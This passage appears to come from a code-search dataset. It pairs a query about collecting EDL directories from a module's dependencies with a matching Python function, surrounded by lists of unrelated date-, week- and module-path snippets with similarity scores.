= 366\n else:\n yearLength = 365\n weekday = DayOfWeek(year, self.month, self.day)\n thursday = ordinalDay + 4 - weekday\n if thursday < 1:\n # Thursday this week was actually last year, and so we are\n # part of the last calendar week of last year too.\n # may return year==0\n year -= 1\n week = WeekCount(year)\n elif thursday > yearLength:\n # Thursday this week is actually next year, and so we are\n # part of the first calendar week of next year too.\n # may return century=100\n year += 1\n week = 1\n else:\n # We are part of this year, but which week?\t Jan 4th is always\n # part of the first week of the year, so we calculate the ordinal\n # value of the Monay that began that week\n yearBase = 5 - DayOfWeek(year, 1, 4)\n week = (ordinalDay - yearBase) // 7 + 1\n return year // 100, (year % 100) // 10, (year % 10), week, weekday", "def week_index(self) -> pulumi.Input[Union[str, 'Type']]:\n return pulumi.get(self, \"week_index\")", "def day_of_week(dt):\n cday = dt\n mday = 2\n uday = cday.isocalendar()[2] + mday\n try:\n if uday > 7:\n CURRDAY = uday - 7\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week>7 : \", CURRDAY)\n else:\n CURRDAY = uday\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week : \", CURRDAY)\n return CURRDAY\n except Exception as e:\n log.exception(\"1;EME;FAILURE;700;SCHEDULE ERROR \" + str(e), exc_info=False)\n sys.exit(0)", "def next_seven_day(self):\n today = datetime.date.today()\n week_next = today + datetime.timedelta(days=7)\n return week_next.strftime('%Y-%m-%d')", "def day_of_week(self) -> str:\n return self.elements[4]", "def test_date_accept_last_week(self):\n spi_search = \"find date last week\"\n inv_search = \"year:\" + datetime.datetime.strftime(datetime.datetime.today()\\\n +dateutil.relativedelta.relativedelta(days=-(7+(datetime.datetime.today().isoweekday()%7))), 
'%Y-%m-%d')\n self._compare_searches(inv_search, spi_search)", "def gen_weeklyFrequency(self):\n\n if len(self.fields) == 0:\n return None\n\n if self.validator.validate(self.fields) == False:\n return None\n\n weeklyFrequency = 0\n dayFields = ['day1','day2','day3','day4','day5','day6','day7']\n for dayField in dayFields:\n if dayField in self.fields:\n if self.fields[dayField] == True:\n weeklyFrequency += 1\n\n return weeklyFrequency", "def _getWeeklyPlayHours(self):\n serverRegionalSettings = BigWorld.player().serverSettings['regional_settings']\n weekDaysCount = account_shared.currentWeekPlayDaysCount(time_utils._g_instance.serverUTCTime, serverRegionalSettings['starting_time_of_a_new_day'], serverRegionalSettings['starting_day_of_a_new_week'])\n return self._getDailyPlayHours() + sum(self.__stats.dailyPlayHours[1:weekDaysCount])", "def get_week_days(year, week):\n d = dt.date(year, 1, 1)\n if(d.weekday() > 3):\n d = d + dt.timedelta(7 - d.weekday())\n else:\n d = d - dt.timedelta(d.weekday())\n dlt = dt.timedelta(days = (week - 1) * 7)\n return d + dlt #, d + dlt + dt.timedelta(days = 6)", "def weekday(self):\n return (self.toordinal() + 6) % 7", "def day_of_week(self) -> pulumi.Input[Union[str, 'WeekDay']]:\n return pulumi.get(self, \"day_of_week\")", "def day_of_week(self) -> pulumi.Input[Union[str, 'WeekDay']]:\n return pulumi.get(self, \"day_of_week\")", "def get_first_day_of_the_week(self):\n if SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=1\n ).exists():\n return 1\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=2\n ).exists():\n return 2\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=3\n ).exists():\n return 3\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=4\n ).exists():\n return 4\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=5\n ).exists():\n return 5\n else:\n return 6", "def get_day_of_week() -> str:\n return datetime.now(pytz.timezone('US/Eastern')).strftime(\"%a\").lower()", "def ISOWEEKNUM(\n date: func_xltypes.XlDateTime\n) -> func_xltypes.XlNumber:\n\n datetime_date = utils.number_to_datetime(int(date))\n isoweeknum = datetime_date.isocalendar()[1]\n return isoweeknum", "def monday_last_week():\n today = datetime.date.today()\n last_week = today - datetime.timedelta(days=7)\n return last_week - datetime.timedelta(days=(last_week.isoweekday() - 1))", "def test_date_accept_this_week(self):\n spi_search = \"find date this week\"\n inv_search = \"year:\" + datetime.datetime.strftime(datetime.datetime.today()\\\n +dateutil.relativedelta.relativedelta(days=-(datetime.datetime.today().isoweekday()%7)), '%Y-%m-%d')\n self._compare_searches(inv_search, spi_search)", "def weekPay(self):\n pay = self.hourlyPay * self.hoursWorked\n return pay", "def get_rollover_weeks(shop):\n d = {}\n ods, r = get_rollovers(shop)\n\n for od in ods:\n week = int(od.eta.strftime('%W'))+1\n if d.has_key(week):\n d[week] += int(od.plan)\n else:\n d[week] = int(od.plan)\n\n # remove the pulled from this week\n this_week = int(datetime.datetime.today().strftime('%W'))+1 \n if d.has_key(this_week):\n d[this_week] = d[this_week] - get_pulled(shop)[1] \n\n # build the return list of (week, '00:00') tuples\n l = []\n d = sorted(d.items()) # sort dictionary by week\n for key, minutes in d:\n formatted_time = _get_display_hours(minutes)\n l.append((key,formatted_time))\n\n return l", "def current_season_phase():\n _update_week_number()\n return 
_cur_season_phase", "def get_weekday_number(date):\n return date.strftime('%w')", "def weekend_start(self) -> int:\n return self._data['week_data']['weekend_start']", "def interval_weeks(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"interval_weeks\")", "def get_weekday():\n result = datetime.today().weekday() + 1\n return result", "def test_weeks(self):\n d = datetime(2014, 1, 29)\n eq_(week_start(d), datetime(2014, 1, 27, 0, 0, 0))\n eq_(week_end(d), datetime(2014, 2, 2, 23, 59, 59))", "def get_week_from_date(date) -> int:\n month, year = date.month, date.year\n if month < 4:\n year -= 1\n ld = _labor_day(year)\n wk1_wed = ld + timedelta(days=2)\n days_since = (date - wk1_wed).days\n weeks_since = days_since / 7.\n week = math.floor(weeks_since) + 1\n return int(week)", "def days_of_the_week(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"days_of_the_week\")", "def weekday(self):\n return 0", "def weekday(self):\n return 0", "def _DayNumToWeekdayNum(daynum):\n return (daynum + _WEEKDAY_BASE) % NUM_WEEKDAYS", "def get_next_weekend():\n d = datetime.date.today()\n # day 5 for saturday\n t = datetime.timedelta((7 + 5 - d.weekday()) % 7)\n return (d + t).strftime('%d-%m-%Y')", "def get_7d(self):\n records = self.level_model.get_for_period(7)\n self.set_attributes(records, '7 days')", "def get_week_date(self, raw_week: str) -> tuple:\n\n search_result = re.search(r'^(\\d+.\\d+)\\s+-\\s+\\d+.\\d+', raw_week)\n\n if \"from\" in raw_week:\n week = re.sub(r'^\\D+', '', raw_week)\n\n elif search_result:\n week = search_result.group(1)\n else:\n week = \"{}.{}\".format(current_day, current_month)\n\n week_in_date_format_1900 = datetime.datetime.strptime(week, \"%d.%m\")\n currect_week = week_in_date_format_1900.replace(current_year)\n\n return currect_week.isoformat(), currect_week.isocalendar()[1]", "def get_this_week_label(self):\n return gettext_lazy('This week')", "def get_week(date):\n\n # TODO: the API seems broken. 
It returns week, year not year, week as documented\n # why not use date.isocalendar() from the stdlib?\n\n date = date_trunc('week', date)\n\n first_monday = date_trunc('week', date_trunc('year', date))\n if first_monday.year < date.year:\n first_monday += datetime.timedelta(weeks=1)\n diff = date_trunc('day', date) - first_monday\n week = 1 + (diff.days / 7)\n return week, first_monday.year", "def schedule_url(year, stype, week):\n xmlurl = 'http://www.nfl.com/ajax/scorestrip?'\n if stype == 'POST':\n week += 17\n if week == 21: # NFL.com you so silly\n week += 1\n return '%sseason=%s&seasonType=%s&week=%s' % (xmlurl, year, stype, week)", "def return_weekly_figure():\n today = datetime.datetime.now()\n\n while 1:\n try:\n today_str = str(today.day) + \"/\" + \"{:02d}\".format(today.month) + \"/\" + str(today.year)\n match = covid_table.find(date=today_str)\n match.next()\n running_total = 0\n for i in range(7):\n running_total += return_daily_figure(today)\n today = today - datetime.timedelta(days=1)\n average_dose_per_day = round(running_total/7)\n return running_total, average_dose_per_day \n except:\n today = today - datetime.timedelta(days=1)", "def GetListOfWeeks(self):\n delta_days = (self.GetFridayOfLastFullWeek() - self.START_DATE).days\n delta_weeks = int(math.floor(delta_days / 7))\n weeks = [self.START_DATE + dt.timedelta(days=7 * x) \n for x in range(0, delta_weeks + 1)]\n weeks = [week.strftime('%Y-%m-%d') for week in weeks]\n self.cursor.execute(\n 'SELECT DISTINCT week FROM %s' % self.BOX_OFFICE_TABLE)\n weeks_in_table = [x[0] for x in self.cursor.fetchall()]\n weeks = list(set(weeks) - set(weeks_in_table))\n weeks.sort() \n return weeks", "def getnextrunningdate(jsondata):\n\n returneddata = json.loads(jsondata)\n days = {}\n\n if returneddata[\"response_code\"]==200:\n trainData = returneddata[\"train\"]\n daysData = trainData[\"days\"]\n if daysData:\n for day in trainData[\"days\"]:\n days[day[\"day-code\"]]=day[\"runs\"]\n\n today = datetime.date.today()\n nextweekday = (today + datetime.timedelta(days=7))\n\n for i in range(len(days)):\n runningdate = (nextweekday + datetime.timedelta(days=i))\n if models.istrainrunningonjourneydate(days, runningdate):\n return runningdate\n\n return nextweekday", "def get_player_stats_from_game(team, year, week):", "def __init__(self, y, w):\n for d in xrange(-10, 370):\n date = datetime.date(y, 1, 1) + datetime.timedelta(d)\n if date.isocalendar() == (y, w, 1):\n date_a = date\n break\n else:\n raise ValueError(\"Invalid week\")\n date_b = date_a + datetime.timedelta(7)\n super(Week, self).__init__(date_a, date_b)", "def WeekdayNum(name):\n return _WEEKDAY_DICT.get(name.capitalize(), 0)", "def week_number(self, bot, update):\n bot.send_message(update.message.chat_id,\n text='Сейчас *{}* учебная неделя.'.format(self.week()),\n parse_mode='Markdown')", "def get_week_range(year, week):\n first_day = datetime.strptime(f\"{year}-W{week}-1\", \"%Y-W%W-%w\").date()\n last_day = first_day + timedelta(days=6)\n return first_day, last_day", "def twenty_seventeen():\n return 2017", "def _next_week(self) -> datetime.datetime:\n now = datetime.datetime.now()\n for i in range(7):\n yield now + datetime.timedelta(i)", "def weekday(self):\n\n return func.extract('dow', self.start_date) + 1", "def what_night_is_it():\n d = datetime.datetime.utcnow() - datetime.timedelta(7 / 24 + 0.5)\n tonight = int(d.strftime('%Y%m%d'))\n return tonight" ]
[ "0.7158167", "0.71226656", "0.7076009", "0.6954984", "0.6877098", "0.6862873", "0.6779078", "0.67491233", "0.66814524", "0.66672885", "0.6630186", "0.66270226", "0.642512", "0.6424101", "0.64128476", "0.6316389", "0.6287629", "0.62338805", "0.62046766", "0.61931086", "0.61917317", "0.61785275", "0.6157817", "0.615032", "0.6119349", "0.6082831", "0.60824424", "0.60644966", "0.6026524", "0.6013661", "0.6007349", "0.60035205", "0.5996054", "0.5974118", "0.5974118", "0.597303", "0.5959178", "0.59562635", "0.59395754", "0.5931542", "0.59278584", "0.59223914", "0.59065086", "0.59048986", "0.5903823", "0.5897497", "0.5884456", "0.58825433", "0.5862913", "0.5845439", "0.5837026", "0.5832195", "0.58313364", "0.583086", "0.582578", "0.5821544", "0.5819251", "0.5808768", "0.5805686", "0.5797578", "0.5760096", "0.5755152", "0.5748477", "0.5748477", "0.5726687", "0.5699749", "0.5688215", "0.56844074", "0.5659063", "0.565614", "0.5655345", "0.5653469", "0.56496656", "0.5635579", "0.56206936", "0.56123", "0.5603281", "0.5581931", "0.55808145", "0.5573596", "0.5573596", "0.55733633", "0.55688834", "0.55655086", "0.5559461", "0.5548173", "0.55454504", "0.5533239", "0.55183434", "0.5506755", "0.550486", "0.5485498", "0.54807687", "0.54727", "0.5459973", "0.5459492", "0.54549944", "0.5450684", "0.54357785", "0.5434279" ]
0.6960671
3
Find list of edl directories in all dependencies for the passed module
def get_edl_dirs(mod, gen_cfg): log.info("Fetching dependencies for %s", coordinates.as_path(mod.coords)) dependencies = mod.get_dependencies() edl_dirs = [mod.get_edl_path()] for dep, dep_coords in dependencies.items(): dep_cfg = gen_cfg.get_mod_cfg(dep) log.info("Dependency: %s", coordinates.as_path(dep_coords)) dep_edl_path = os.path.join(mod.mirror_root, coordinates.as_path(dep_coords, False)[1:], dep_coords.version, dep_cfg.edl_dir) edl_dirs.append(dep_edl_path) return edl_dirs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _compute_module_search_path(self, pkg_name):\n pkg_location = self.get_package_location(pkg_name)\n module_search_path = [pkg_location, os.path.join(pkg_location,'lib')]\n st, cycle = graph.dfs(self.package_dependency, pkg_name)\n # computed packages on which this task depends\n required_pkgs = [self.get_package_location(x) for x in \\\n st.keys() if st[x] is not None]\n module_search_path += required_pkgs\n module_search_path += [os.path.join(x, 'lib') for x in required_pkgs]\n return module_search_path, cycle", "def getModules() -> tuple:\n return data.getFoldersOf(data.ETC)", "def library_dirs(self):", "def modules():\n return [os.path.relpath(os.path.join(root, filename), 'groot_ansible')\n for root, _, filenames in os.walk('groot_ansible/playbooks/library') for filename in filenames if '.git' not in root.split(os.sep)\n ]", "def __dir__():\n return __all__", "def find_package_data(module, path):\n files = []\n exclude = re.compile(\"\\.pyc$|~$\")\n for dirpath, dirnames, filenames in os.walk(os.path.join(module,path)):\n for filename in filenames:\n if not exclude.search(filename):\n files.append(os.path.relpath(os.path.join(dirpath,filename),module))\n return {module:files}", "def dcs_modules():\n\n dcs_dirname = os.path.dirname(__file__)\n module_prefix = __package__ + '.'\n\n if getattr(sys, 'frozen', False):\n importer = pkgutil.get_importer(dcs_dirname)\n return [module for module in list(importer.toc) if module.startswith(module_prefix) and module.count('.') == 2]\n else:\n return [module_prefix + name for _, name, is_pkg in pkgutil.iter_modules([dcs_dirname]) if not is_pkg]", "def __dir__():\n keys = (*globals().keys(), *_lazy_imports_obj.keys(), *_lazy_imports_mod.keys())\n return sorted(keys)", "def dependency_dir(self) -> Path:", "def include_dirs(self):", "def getDepList(self, dict):\n \n if( dict.has_key( self.name) ):\n return\n else:\n dict[ self.name ] = self.installPath\n\n if( len( dict ) > 1 ):\n mods = self.reqmodules + self.optmodules\n else:\n mods = self.reqmodules + self.optmodules + self.reqmodules_buildonly\n \n for modname in mods:\n if( self.parent.module(modname) != None ):\n self.parent.module(modname).getDepList( dict )", "def find_enstools_packages():\n\n return [f'enstools.{p}' for p in (find_packages(f'{os.path.dirname(__file__)}/enstools'))]", "def library_search_path(self, pedantic=False):\n return []", "def listConfigModules(etcdir):\n if not os.path.isdir(etcdir):\n return iter(())\n return (name for name in os.listdir(etcdir)\n if (name.endswith('.py')\n and os.path.isfile(os.path.join(etcdir, name)))\n )", "def lib_dirs(self):\r\n ret = []\r\n for x in [y.type for y in self.variables] + [\r\n y.op for y in self.node_order]:\r\n try:\r\n ret += x.c_lib_dirs()\r\n except utils.MethodNotDefined:\r\n pass\r\n return utils.uniq(ret)", "def list_modules():\n for module_name in listdir(modules_directory):\n if isdir(join(modules_directory, module_name)):\n log.debug('Load module: {0}'.format(module_name))\n yield module_name", "def find_modules(x):\n return Path(x).rglob('*.py')", "def find_with_deps(self, package_names):", "def get_dep_map(kerneldir):\n\n\tf = open(os.path.join(kerneldir, 'modules.dep'))\n\tdeps = {}\n\tfor l in f:\n\t\t#print repr(l)\n\t\tmod, dep_list_str = l.strip().split(':', 1)\n\t\tassert mod not in deps\n\n\t\tkmod = KModuleName(mod)\n\t\tdep_list = [KModuleName(x) for x in dep_list_str.strip().split()]\n\t\tdep_list.insert(0, kmod)\t# prepend ourself as a dependency\n\n\t\tdeps[kmod] = dep_list\n\n\tf.close()\n\treturn 
deps", "def my_find_packages(*args):\n import os\n packages = []\n for root_module_dir in args:\n for root, dirs, files in os.walk(root_module_dir):\n if '__init__.py' in files:\n packages.append(root)\n return packages", "def find_dependent_modules():\n tree = {}\n for module in sys.modules.values():\n if module is None:\n continue\n tree[module] = set()\n for attr_name in dir(module):\n attr = getattr(module, attr_name)\n if isinstance(attr, ModuleType):\n tree[module].add(attr)\n elif type(attr) in (FunctionType, type):\n tree[module].add(attr.__module__)\n return tree", "def _scan_fortran_file_deps(src: Path, srcdir: Path, dirname: Path, tdeps, compiler) -> T.List[str]:\n\n incre = re.compile(FORTRAN_INCLUDE_PAT, re.IGNORECASE)\n usere = re.compile(FORTRAN_USE_PAT, re.IGNORECASE)\n submodre = re.compile(FORTRAN_SUBMOD_PAT, re.IGNORECASE)\n\n mod_files = []\n src = Path(src)\n with src.open(encoding='ascii', errors='ignore') as f:\n for line in f:\n # included files\n incmatch = incre.match(line)\n if incmatch is not None:\n incfile = src.parent / incmatch.group(1)\n # NOTE: src.parent is most general, in particular for CMake subproject with Fortran file\n # having an `include 'foo.f'` statement.\n if incfile.suffix.lower()[1:] in compiler.file_suffixes:\n mod_files.extend(_scan_fortran_file_deps(incfile, srcdir, dirname, tdeps, compiler))\n # modules\n usematch = usere.match(line)\n if usematch is not None:\n usename = usematch.group(1).lower()\n if usename == 'intrinsic': # this keeps the regex simpler\n continue\n if usename not in tdeps:\n # The module is not provided by any source file. This\n # is due to:\n # a) missing file/typo/etc\n # b) using a module provided by the compiler, such as\n # OpenMP\n # There's no easy way to tell which is which (that I\n # know of) so just ignore this and go on. 
Ideally we\n # would print a warning message to the user but this is\n # a common occurrence, which would lead to lots of\n # distracting noise.\n continue\n srcfile = srcdir / tdeps[usename].fname\n if not srcfile.is_file():\n if srcfile.name != src.name: # generated source file\n pass\n else: # subproject\n continue\n elif srcfile.samefile(src): # self-reference\n continue\n\n mod_name = compiler.module_name_to_filename(usename)\n mod_files.append(str(dirname / mod_name))\n else: # submodules\n submodmatch = submodre.match(line)\n if submodmatch is not None:\n parents = submodmatch.group(1).lower().split(':')\n assert len(parents) in {1, 2}, (\n 'submodule ancestry must be specified as'\n f' ancestor:parent but Meson found {parents}')\n\n ancestor_child = '_'.join(parents)\n if ancestor_child not in tdeps:\n raise MesonException(\"submodule {} relies on ancestor module {} that was not found.\".format(submodmatch.group(2).lower(), ancestor_child.split('_', maxsplit=1)[0]))\n submodsrcfile = srcdir / tdeps[ancestor_child].fname\n if not submodsrcfile.is_file():\n if submodsrcfile.name != src.name: # generated source file\n pass\n else: # subproject\n continue\n elif submodsrcfile.samefile(src): # self-reference\n continue\n mod_name = compiler.module_name_to_filename(ancestor_child)\n mod_files.append(str(dirname / mod_name))\n return mod_files", "def getExtraDlls(self, module):\n\n full_name = module.getFullName()\n\n if full_name == \"kivy\":\n kivy_info = self._getKivyInformation()\n\n kivy_dlls = []\n for dll_folder in kivy_info.sdl2_dep_bins + kivy_info.glew_dep_bins:\n kivy_dlls.extend(self.locateDLLsInDirectory(dll_folder))\n\n for full_path, target_filename, _dll_extension in kivy_dlls:\n yield self.makeDllEntryPoint(\n source_path=full_path,\n dest_path=target_filename,\n package_name=full_name,\n reason=\"needed by 'kivy'\",\n )\n\n self.reportFileCount(full_name, len(kivy_dlls))", "def __dir__():\n import pkgutil\n\n names = [\n name\n for importer, name, ispkg in pkgutil.iter_modules(__path__)\n if not ispkg and name != \"base\"\n ]\n return names + [\"custom\", \"noData\"]", "def moduleList(path):\n\n if os.path.isdir(path):\n folder_list = os.listdir(path)\n elif path.endswith('.egg'):\n try:\n folder_list = [f for f in zipimporter(path)._files]\n except:\n folder_list = []\n else:\n folder_list = []\n #folder_list = glob.glob(os.path.join(path,'*'))\n folder_list = [p for p in folder_list \\\n if os.path.exists(os.path.join(path, p,'__init__.py'))\\\n or p[-3:] in ('.py','.so')\\\n or p[-4:] in ('.pyc','.pyo','.pyd')]\n\n folder_list = [os.path.basename(p).split('.')[0] for p in folder_list]\n return folder_list", "def get_modules(self):\n return self._module_loader.filelist", "def test_get_leaf_modules(request):\n filename = request.module.__file__\n qalgebra_dir = os.path.join(\n os.path.split(filename)[0], '..', 'src', 'qalgebra'\n )\n modules = get_leaf_modules(qalgebra_dir)\n assert \"qalgebra.core.abstract_algebra\" in modules", "def __dir__(self):\n result = list(new_module.__all__)\n result.extend(('__file__', '__path__', '__doc__', '__all__',\n '__docformat__', '__name__', '__path__',\n '__package__', '__version__'))\n return result", "def find_all_test_files():\n #test_file_pattern = re.compile('^t(est)?_.*\\.py$')\n test_file_pattern = re.compile('.*_test\\.py$')\n is_test_file = lambda filename: test_file_pattern.match(filename)\n drop_dot_py = lambda filename: filename[:-3]\n join_module = lambda *names: '/'.join(names)\n\n modules = []\n for root, dirs, files 
in os.walk(os.curdir):\n root_name = os.path.split(root)[-1]\n for test_file in filter(is_test_file, files):\n module = join_module(root_name, drop_dot_py(test_file))\n modules.append(module)\n #modules += ['.'.join([root_name, drop_dot_py(test_file)]) for test_file in filter(is_test, files)]\n return modules", "def freeze_includes() -> List[str]:\n import _pytest\n\n result = list(_iter_all_modules(_pytest))\n return result", "def demo_paths(self):\n base_path = os.path.join(self.module.__path__[0], 'demo')\n paths = []\n if os.path.isdir(base_path):\n for item in os.listdir(base_path):\n # TODO: support examples which is not auto-loaded\n if not os.path.isdir(os.path.join(base_path, 'examples')):\n paths.append(os.path.join(base_path, item))\n return paths", "def modules():", "def library_directories(self):\n\n status, stdout, stderr = self.__xcall__(['--libs-only-L'])\n\n if status != 0:\n raise RuntimeError(\"error querying --libs-only-L for package `%s': %s\" % (self.name, stderr))\n\n retval = []\n for token in stdout.split():\n retval.append(token[2:])\n\n return uniq(retval)", "def __compute_dependencies(self):\n prefix = \"github.com/DataDog/datadog-agent/\"\n base_path = os.getcwd()\n mod_parser_path = os.path.join(base_path, \"internal\", \"tools\", \"modparser\")\n\n if not os.path.isdir(mod_parser_path):\n raise Exception(f\"Cannot find go.mod parser in {mod_parser_path}\")\n\n try:\n output = subprocess.check_output(\n [\"go\", \"run\", \".\", \"-path\", os.path.join(base_path, self.path), \"-prefix\", prefix],\n cwd=mod_parser_path,\n ).decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n print(f\"Error while calling go.mod parser: {e.output}\")\n raise e\n\n # Remove github.com/DataDog/datadog-agent/ from each line\n return [line[len(prefix) :] for line in output.strip().splitlines()]", "def find_ext_modules(self):\n return (\n _create_extensions(self.package_name, self.ext_module_dirs)\n if self.ext_module_dirs\n else self._find_ext_modules_from_hint()\n if self.ext_module_hint\n else None\n )", "def get_leaf_modules(package_path):\n assert os.path.isfile(os.path.join(package_path, '__init__.py'))\n res = []\n root = os.path.join(package_path, '..')\n for path, _, files in os.walk(package_path):\n for f in files:\n if f.endswith(\".py\") and not f == \"__init__.py\":\n full_file = os.path.relpath(os.path.join(path, f), start=root)\n module = full_file.replace(os.sep, \".\")[:-3]\n res.append(module)\n return res", "def getOMFSrcModuleFiles(self) -> List[ghidra.app.util.bin.format.pe.debug.OMFSrcModuleFile]:\n ...", "def dependencies(project_name):\n deps = []\n logging.info('Locating {}'.format(project_name))\n located = distlib.locators.locate(project_name, prereleases=True)\n if located is None:\n logging.warn('{} not found'.format(project_name))\n return []\n for dep in located.run_requires:\n # Drop any version details from the dependency name.\n deps.append(just_name(dep))\n return deps", "def list_modules(lookup_paths: list = None):\n result = []\n\n if lookup_paths is None:\n lookup_paths = analyzer_paths()\n\n for path in lookup_paths:\n analyzer_module_root = resource_filename(path, \"modules\")\n # analyzer_root = os.path.join(anchore_module_root, \"modules\")\n for f in os.listdir(analyzer_module_root):\n thecmd = os.path.join(analyzer_module_root, f)\n if re.match(r\".*\\.py$\", thecmd):\n result.append(thecmd)\n\n result.sort(key=lambda x: analyzer_name_from_path(x))\n return result", "def _get_sourceFolders(self, dom):\n return 
self._get_new_module_root_manager(dom).getElementsByTagName('sourceFolder')", "def _include_dir_list_yaml(\n loader: SafeLineLoader, node: yaml.nodes.Node\n) -> List[JSON_TYPE]:\n loc = os.path.join(os.path.dirname(loader.name), node.value)\n return [load_yaml(f) for f in _find_files(loc, \"*.yaml\")]", "def resolve_deps(modules, dep_map):\n\n\tall_modules = []\n\tfor mod in modules:\n\t\tmodule_deps = dep_map[ get_kmodule(mod, dep_map) ]\n\n\t\tfor dep in module_deps:\n\t\t\tif dep not in all_modules:\n\t\t\t\tall_modules.append(dep)\n\t\n\treturn all_modules", "def linking_library_dirs(self):", "def iter_extension_paths():\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))", "def plugin_get_dependency():\n return []", "def get_fsleyes_deps():\n\n # The dependency list is stored in requirements.txt\n with open(op.join(basedir, 'requirements.txt'), 'rt') as f:\n install_requires = f.readlines()\n\n return [i.strip() for i in install_requires]", "def getRootModules():\n modules = []\n if ip.db.has_key('rootmodules'):\n return ip.db['rootmodules']\n t = time()\n store = False\n for path in sys.path:\n modules += moduleList(path) \n if time() - t >= TIMEOUT_STORAGE and not store:\n store = True\n print \"\\nCaching the list of root modules, please wait!\" \n print \"(This will only be done once - type '%rehashx' to \" + \\\n \"reset cache!)\"\n print\n if time() - t > TIMEOUT_GIVEUP:\n print \"This is taking too long, we give up.\"\n print\n ip.db['rootmodules'] = []\n return []\n \n modules += sys.builtin_module_names\n \n modules = list(set(modules))\n if '__init__' in modules:\n modules.remove('__init__')\n modules = list(set(modules))\n if store:\n ip.db['rootmodules'] = modules\n return modules", "def _find_files(root_dir, should_include):\n paths = [] # Return value.\n\n is_module = lambda path: path.endswith(\".py\")\n\n # os.walk() is new in Python 2.3\n # http://docs.python.org/library/os.html#os.walk\n for dir_path, dir_names, file_names in os.walk(root_dir):\n new_paths = [os.path.join(dir_path, file_name) for file_name in file_names]\n new_paths = filter(is_module, new_paths)\n new_paths = filter(should_include, new_paths)\n paths.extend(new_paths)\n\n return paths", "def module_yamls(self):\n # app.yaml first (correspond to 'default' module), then everything else.\n yamls = self._modules.copy()\n return [yamls.pop('default').path] + [m.path for m in yamls.itervalues()]", "def get_installed_modules(dir, repo_type=\"modules\"):\n # initialize lists\n local_modules = []\n nfcore_modules = []\n local_modules_dir = None\n nfcore_modules_dir = os.path.join(dir, \"modules\", \"nf-core\")\n\n # Get local modules\n if repo_type == \"pipeline\":\n local_modules_dir = os.path.join(dir, \"modules\", \"local\")\n\n # Filter local modules\n if os.path.exists(local_modules_dir):\n local_modules = os.listdir(local_modules_dir)\n local_modules = sorted([x for x in local_modules if x.endswith(\".nf\")])\n\n # Get nf-core modules\n if os.path.exists(nfcore_modules_dir):\n for m in sorted([m for m in os.listdir(nfcore_modules_dir) if not m == \"lib\"]):\n if not os.path.isdir(os.path.join(nfcore_modules_dir, m)):\n raise ModuleException(\n f\"File found in '{nfcore_modules_dir}': '{m}'! 
This directory should only contain module directories.\"\n )\n m_content = os.listdir(os.path.join(nfcore_modules_dir, m))\n # Not a module, but contains sub-modules\n if not \"main.nf\" in m_content:\n for tool in m_content:\n nfcore_modules.append(os.path.join(m, tool))\n else:\n nfcore_modules.append(m)\n\n # Make full (relative) file paths and create NFCoreModule objects\n local_modules = [os.path.join(local_modules_dir, m) for m in local_modules]\n nfcore_modules = [\n NFCoreModule(m, \"nf-core/modules\", Path(nfcore_modules_dir, m), repo_type=repo_type, base_dir=Path(dir))\n for m in nfcore_modules\n ]\n\n return local_modules, nfcore_modules", "def _get_libs_from_tree(charm_name=None):\n local_libs_data = []\n\n if charm_name is None:\n base_dir = pathlib.Path(\"lib\") / \"charms\"\n charm_dirs = sorted(base_dir.iterdir()) if base_dir.is_dir() else []\n else:\n importable_charm_name = create_importable_name(charm_name)\n base_dir = pathlib.Path(\"lib\") / \"charms\" / importable_charm_name\n charm_dirs = [base_dir] if base_dir.is_dir() else []\n\n for charm_dir in charm_dirs:\n for v_dir in sorted(charm_dir.iterdir()):\n if v_dir.is_dir() and v_dir.name[0] == \"v\" and v_dir.name[1:].isdigit():\n for libfile in sorted(v_dir.glob(\"*.py\")):\n local_libs_data.append(_get_lib_info(lib_path=libfile))\n\n found_libs = [lib_data.full_name for lib_data in local_libs_data]\n logger.debug(\"Libraries found under %r: %s\", str(base_dir), found_libs)\n return local_libs_data", "def get_log_paths(root_dir: str) -> List[str]:\n paths = []\n if not tf.io.gfile.isdir(root_dir):\n raise ValueError(f'{root_dir} is not a directory.')\n for path, _, files in tf.io.gfile.walk(root_dir):\n if 'metadata.riegeli' in files:\n paths.append(path)\n return paths", "def get_fortran_deps(self, compiler: FortranCompiler, src: Path, target) -> T.List[str]:\n if self.use_dyndeps_for_fortran():\n return []\n\n dirname = Path(self.get_target_private_dir(target))\n tdeps = self.fortran_deps[target.get_basename()]\n srcdir = Path(self.source_dir)\n\n mod_files = _scan_fortran_file_deps(src, srcdir, dirname, tdeps, compiler)\n return mod_files", "def find_dcds(src):\n\n dcd_paths = []\n\n for root, dirs, files in os.walk(src):\n for filename in files:\n if filename.endswith(\".dcd\"):\n dcd_paths.append(os.path.join(root, filename))\n\n return dcd_paths", "def _find_module_path(self, fullname, module_name, search_dirs):\n self.msgin(4, \"_find_module_path <-\", fullname, search_dirs)\n\n # Top-level 2-tuple to be returned.\n path_data = None\n\n # List of the absolute paths of all directories comprising the\n # namespace package to which this module belongs if any.\n namespace_dirs = []\n\n try:\n for search_dir in search_dirs:\n # PEP 302-compliant importer making loaders for this directory.\n importer = pkgutil.get_importer(search_dir)\n\n # If this directory is not importable, continue.\n if importer is None:\n # self.msg(4, \"_find_module_path importer not found\", search_dir)\n continue\n\n # Get the PEP 302-compliant loader object loading this module.\n #\n # If this importer defines the PEP 302-compliant find_loader()\n # method, prefer that.\n if hasattr(importer, 'find_loader'):\n loader, loader_namespace_dirs = importer.find_loader(\n module_name)\n namespace_dirs.extend(loader_namespace_dirs)\n # Else if this importer defines the Python 2-specific\n # find_module() method, fall back to that. 
